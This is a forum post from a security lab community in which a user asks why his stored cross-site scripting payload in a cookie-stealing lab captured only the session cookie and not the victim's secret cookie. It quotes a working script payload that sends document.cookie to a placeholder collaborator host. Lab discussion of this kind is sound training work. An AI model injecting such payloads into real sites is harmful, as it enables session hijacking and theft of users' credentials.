Burp Suite User Forum

Login to post

Lab: Exploiting cross-site scripting to steal cookies

paul | Last updated: May 13, 2022 03:13PM UTC

For this lab I attempted to add a new image via javascript by appending it to the body in the DOM. The image src included the collaborator domain plus a request param whose value was set to the document.cookie. I could see this sending the session cookie in my collab client so that interaction appeared to work. However I didn't get the victims 'secret' cookie. I only got their secret cookie and session cookie when I tried the suggested solution of a POST to the collab domain with the document.cookie set as the body. I'd like to understand why my solution didn't appear to work? I set the comment to something like <script> var i = new Image(); i.src = 'http://<my-collab-domain>/?cookie=' + document.cookie; document.querySelector('body').appendChild(i); </script>

You need to Log in to post a reply. Or register here, for free.